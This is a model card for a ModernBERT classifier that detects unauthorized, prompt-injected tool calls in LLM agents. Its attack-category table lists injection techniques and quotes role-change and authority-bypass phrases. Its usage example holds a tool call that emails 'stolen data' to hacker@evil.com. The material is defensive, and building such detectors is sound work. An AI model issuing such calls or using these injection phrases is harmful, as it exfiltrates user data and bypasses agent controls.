---
language:
- en
license: apache-2.0
library_name: transformers
tags:
- modernbert
- security
- jailbreak-detection
- prompt-injection
- token-classification
- tool-calling
- llm-safety
- mcp
datasets:
- microsoft/llmail-inject-challenge
- allenai/wildjailbreak
- hackaprompt/hackaprompt-dataset
- JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
- name: tool-call-verifier
  results:
  - task:
      type: token-classification
      name: Unauthorized Tool Call Detection
    metrics:
    - name: UNAUTHORIZED F1
      type: f1
      value: 0.9350
    - name: UNAUTHORIZED Precision
      type: precision
      value: 0.9501
    - name: UNAUTHORIZED Recall
      type: recall
      value: 0.9205
    - name: Accuracy
      type: accuracy
      value: 0.9288
---

# ToolCallVerifier - Unauthorized Tool Call Detection

[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
[![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)

**Stage 2 of Two-Stage LLM Agent Defense Pipeline**

---

## 🎯 What This Model Does

ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.

| Label | Description |
|-------|-------------|
| `AUTHORIZED` | Token is part of a legitimate, user-requested action |
| `UNAUTHORIZED` | Token indicates injected or malicious content: **BLOCK** |

---

## 📊 Performance

| Metric | Value |
|--------|-------|
| **UNAUTHORIZED F1** | **93.50%** |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |

### Confusion Matrix (Token-Level)

```
                   Predicted
                AUTH     UNAUTH
Actual AUTH    130,708     8,483
       UNAUTH   13,924   161,031
```

---

## 🗂️ Training Data

Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:

### HuggingFace Datasets

| Dataset | Description | Samples |
|---------|-------------|---------|
| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |

### Synthetic Attack Generators

| Generator | Description |
|-----------|-------------|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |

---

## 🚨 Attack Categories Covered

| Category | Source | Description |
|----------|--------|-------------|
| Delimiter Injection | LLMail | `<>`, `>>}}\]\])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | ``, `` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |

---

## 💻 Usage

```python
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# Example: verify a tool call against the user's stated intent
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'

# Combine intent and tool call into a single sequence for classification
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
# Note: fine-tuning used a 512-token max length (see Training Configuration),
# so inputs longer than that fall outside the length seen during training.
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

with torch.no_grad():
    outputs = model(**inputs)

# Pick the highest-scoring label for each token
predictions = torch.argmax(outputs.logits, dim=-1)

id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]

if unauthorized_tokens:
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("✅ Tool call authorized")
```

---

## ⚙️ Training Configuration

| Parameter | Value |
|-----------|-------|
| Base Model | `answerdotai/ModernBERT-base` |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |

---

## 🔗 Integration with FunctionCallSentinel

This model is **Stage 2** of a two-stage defense pipeline:

```
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
│                 │     │      (Stage 1)       │     │                 │
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                              │
                               ┌──────────────────────────────▼──────────────────────────┐
                               │              ToolCallVerifier (This Model)              │
                               │     Token-level verification before tool execution      │
                               └─────────────────────────────────────────────────────────┘
```

| Scenario | Recommendation |
|----------|----------------|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | **Both stages** |
| Email/file system access | **Both stages** |
| Financial transactions | **Both stages** |

---

## 🎯 Intended Use

### Primary Use Cases

- **LLM Agent Security**: Verify tool calls before execution
- **Prompt Injection Defense**: Detect unauthorized actions from injected prompts
- **API Gateway Protection**: Filter malicious tool calls at infrastructure level

### Out of Scope

- General text classification
- Non-tool-calling scenarios
- Languages other than English

---

## ⚠️ Limitations

1. **Tool schema dependent**: Best performance when the tool schema is included in the input
2. **English only**: Not tested on other languages
3. **Binary classification**: No "suspicious" intermediate category (by design, for decisiveness)

---

## 📜 License

Apache 2.0

---

## 🔗 Links

- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)
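
---

## 🧮 Checking the Reported Metrics

The UNAUTHORIZED metrics in the Performance section can be cross-checked against the token-level confusion matrix given there. The sketch below is illustrative only: it treats UNAUTHORIZED as the positive class and recomputes precision, recall, F1, and accuracy from the four counts. The variable names are our own, and the card does not describe how the original evaluation rounded or averaged its numbers, so small differences from the table are to be expected.

```python
# Counts copied from the token-level confusion matrix in the Performance section.
# Assumption: UNAUTHORIZED is the positive class.
tn = 130_708  # actual AUTHORIZED,   predicted AUTHORIZED
fp = 8_483    # actual AUTHORIZED,   predicted UNAUTHORIZED
fn = 13_924   # actual UNAUTHORIZED, predicted AUTHORIZED
tp = 161_031  # actual UNAUTHORIZED, predicted UNAUTHORIZED

# Standard binary-classification definitions.
precision = tp / (tp + fp)
recall = tp / (tp + fn)
f1 = 2 * precision * recall / (precision + recall)
accuracy = (tp + tn) / (tp + tn + fp + fn)

metrics = {
    "UNAUTHORIZED precision": precision,
    "UNAUTHORIZED recall": recall,
    "UNAUTHORIZED F1": f1,
    "Overall accuracy": accuracy,
}

for name, value in metrics.items():
    print(f"{name}: {value:.2%}")
```

Recomputed this way, each value lands within about 0.02 percentage points of the corresponding entry in the Performance table, and F1 matches it at two decimal places.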